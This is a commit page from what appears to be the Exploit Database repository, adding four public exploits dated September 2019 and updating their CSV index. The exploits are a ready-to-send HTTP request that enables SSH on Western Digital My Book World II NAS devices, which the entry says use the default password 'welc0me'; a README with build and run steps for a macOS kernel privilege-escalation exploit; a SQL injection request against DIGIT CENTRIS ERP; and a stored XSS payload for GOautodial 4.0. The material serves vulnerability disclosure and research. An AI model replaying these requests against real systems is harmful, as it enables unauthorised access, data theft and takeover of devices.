Skip to content

Commit d6e0b04

Browse files
author
Offensive Security
committed
DB: 2019-09-20
4 changes to exploits/shellcodes macOS 18.7.0 Kernel - Local Privilege Escalation Western Digital My Book World II NAS 1.02.12 - Authentication Bypass / Command Execution DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting
1 parent 401d4ea commit d6e0b04

File tree

5 files changed

+135
-0
lines changed

5 files changed

+135
-0
lines changed

exploits/hardware/webapps/47399.txt

Lines changed: 25 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,25 @@
1+
# Exploit Title: Western Digital My Book World II NAS <= 1.02.12 - Broken Authentication to RCE
2+
# Google Dork: intitle:"My Book World Edition - MyBookWorld"
3+
# Date: 19th Sep, 2019
4+
# Exploit Author: Noman Riffat, National Security Services Group (NSSG)
5+
# Vendor Homepage: https://wd.com/
6+
# Software Link: https://support.wdc.com/downloads.aspx?p=130&lang=en
7+
# Version: <= 1.02.12
8+
# Tested on: Firmware
9+
# CVE : CVE-2019-16399
10+
POST /admin/system_advanced.php?lang=en HTTP/1.1
11+
Host: x.x.x.x
12+
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
13+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
14+
Accept-Language: en-US,en;q=0.5
15+
Accept-Encoding: gzip, deflate
16+
Content-Type: application/x-www-form-urlencoded
17+
Upgrade-Insecure-Requests: 1
18+
Content-Length: 241
19+
orig_ssl_key=&orig_ssl_certificate=&submit_type=ssh&current_ssh=&enablessh=yes&Submit=Submit&ssl_certificate=Paste+a+signed+certificate+in+X.509+PEM+format+here.&ssl_key=Paste+a+RSA+private+key+in+PEM+format+here.&hddstandby=on&ledcontrol=on
20+
/*
21+
The default password for SSH is 'welc0me' and the only security measure preventing SSH Login is the disabled SSH Port and it can be enabled with above POST Header. The attacker can then login to SSH Port with default password. WD My Book World II NAS is very outdated hardware and Western Digitial may never release update for it. It is still using PHP 4 so it has more potential of Remote Exploits. All firmwares listed at https://support.wdc.com/downloads.aspx?p=130&lang=en are vulnerable.
22+
There is no update coming probably and if you want to remain safe, abandon this NAS and switch to the latest hardware.
23+
*/
24+
Security Researcher - Noman Riffat, National Security Services Group (NSSG)
25+
@nomanriffat, @nssgoman

exploits/macos/local/47400.md

Lines changed: 54 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,54 @@
1+
# macOS-Kernel-Exploit
2+
3+
## DISCLAIMER
4+
You need to know the KASLR slide to use the exploit. Also SMAP needs to be disabled which means that it's not exploitable on Macs after 2015. These limitations make the exploit pretty much unusable for in-the-wild exploitation but still helpful for
5+
security researchers in a controlled lab environment.
6+
7+
This exploit is intended for security research purposes only.
8+
9+
## General
10+
macOS Kernel Exploit for CVE-????-???? (currently a 0day.
11+
I'll add the CVE# once it is published ;) ).
12+
13+
Thanks to @LinusHenze for this cool bug and his support ;P.
14+
15+
## Writeup
16+
17+
Probably coming soon.
18+
If you want to try and exploit it yourself, here are a few things to get you started:
19+
20+
- VM: Download the macOS installer from the appstore and drag the `.app` file into VMWare's `NEW VM` window
21+
- Kernel Debugging setup: http://ddeville.me/2015/08/using-the-vmware-fusion-gdb-stub-for-kernel-debugging-with-lldb
22+
- Have a look at the _kernel_trap function
23+
24+
25+
## Build
26+
27+
I recommend setting the bootargs to: `debug=0x44 kcsuffix=development -v `
28+
29+
:warning: **Note**: SMAP needs to be disabled on macs after 2015 (`-pmap_smap_disable`)
30+
31+
You will need XCODE <= 9.4.1 to build the exploit. (It needs to be 32bit)
32+
Downloading Xcode 9.4.1 Commandline Tools should be enough ;)
33+
Download: https://developer.apple.com/download/more/
34+
35+
```
36+
make
37+
```
38+
39+
## Execution
40+
41+
```
42+
./exploit <KASLR slide>
43+
```
44+
45+
Tested on macOS Mojave: `Darwin Kernel-Mac.local 18.7.0 Darwin Kernel Version 18.7.0: Thu Jun 20 18:42:21 PDT 2019; root:xnu-4903.270.47~4/DEVELOPMENT_X86_64 x86_64`
46+
47+
**Demo**:
48+
49+
[![asciicast](https://asciinema.org/a/UBmByRiRR0y5USBwuHKC5X7GU.png)](https://asciinema.org/a/UBmByRiRR0y5USBwuHKC5X7GU)
50+
51+
52+
- - -
53+
54+
EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47400.zip

exploits/php/webapps/47401.txt

Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
# Exploit Title: DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection
2+
# Date: 2019-09-19
3+
# Exploit Author: n1x_ [MS-WEB]
4+
# Vendor Homepage: http://www.digit-rs.com/
5+
# Product Homepage: http://digit-rs.com/centris.html
6+
# Version: Every version
7+
# CVE : N/A
8+
9+
# Vulnerable parameters: datum1, datum2, KID, PID
10+
11+
# [POST REQUEST]
12+
13+
POST /korisnikinfo.php HTTP/1.1
14+
Content-Length: 65
15+
Content-Type: application/x-www-form-urlencoded
16+
Referer: http://host
17+
Host: host
18+
Connection: Keep-alive
19+
Accept-Encoding: gzip,deflate
20+
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
21+
Accept: */*
22+
23+
ListaPDF=Lista%20u%20PDF&datum1=1'"&datum2=01.01.2001'"&KID=1'"&PID=1'"

exploits/php/webapps/47402.txt

Lines changed: 29 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,29 @@
1+
# Exploit Title: GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting
2+
# Author: Cakes
3+
# Discovery Date: 2019-09-19
4+
# Vendor Homepage: https://goautodial.org/
5+
# Software Link: https://downloads2.goautodial.org/centos/7/isos/x86_64/GOautodial-4-x86_64-Pre-Release-20180929-0618.iso
6+
# Tested Version: 4.0
7+
# Tested on OS: CentOS 7
8+
# CVE: N/A
9+
10+
# Discription:
11+
# Simple XSS attack after application authentication.
12+
13+
# POST Request
14+
15+
POST /php/CreateEvent.php HTTP/1.1
16+
Host: 10.0.0.25
17+
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
18+
Accept: */*
19+
Accept-Language: en-US,en;q=0.5
20+
Accept-Encoding: gzip, deflate
21+
Referer: https://10.0.0.25/events.php
22+
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
23+
X-Requested-With: XMLHttpRequest
24+
Content-Length: 69
25+
Cookie: PHPSESSID=b9jgg31ufmmgf84qdd6jq6v3i1
26+
Connection: close
27+
DNT: 1
28+
29+
title=%3Cscript%3Ealert(%22TEST%22)%3B%3C%2Fscript%3E&color=%2300c0ef

files_exploits.csv

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -10684,6 +10684,7 @@ id,file,description,date,author,type,platform,port
1068410684
47378,exploits/windows/local/47378.rb,"Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry (Metasploit)",2019-09-10,Metasploit,local,windows,
1068510685
47389,exploits/windows/local/47389.txt,"AppXSvc - Privilege Escalation",2019-09-16,"Gabor Seljan",local,windows,
1068610686
47394,exploits/windows/local/47394.py,"docPrint Pro 8.0 - SEH Buffer Overflow",2019-09-16,"Connor McGarr",local,windows,
10687+
47400,exploits/macos/local/47400.md,"macOS 18.7.0 Kernel - Local Privilege Escalation",2019-09-19,A2nkF,local,macos,
1068710688
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
1068810689
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
1068910690
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41741,3 +41742,6 @@ id,file,description,date,author,type,platform,port
4174141742
47392,exploits/cfm/webapps/47392.txt,"Symantec Advanced Secure Gateway (ASG) / ProxySG - Unrestricted File Upload",2019-09-16,"Pankaj Kumar Thakur",webapps,cfm,
4174241743
47395,exploits/php/webapps/47395.txt,"CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection",2019-09-16,cakes,webapps,php,
4174341744
47398,exploits/php/webapps/47398.txt,"Hospital-Management 1.26 - 'fname' SQL Injection",2019-09-18,cakes,webapps,php,
41745+
47399,exploits/hardware/webapps/47399.txt,"Western Digital My Book World II NAS 1.02.12 - Authentication Bypass / Command Execution",2019-09-19,"Noman Riffat",webapps,hardware,
41746+
47401,exploits/php/webapps/47401.txt,"DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection",2019-09-19,n1x_,webapps,php,
41747+
47402,exploits/php/webapps/47402.txt,"GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting",2019-09-19,cakes,webapps,php,

0 commit comments

Comments
 (0)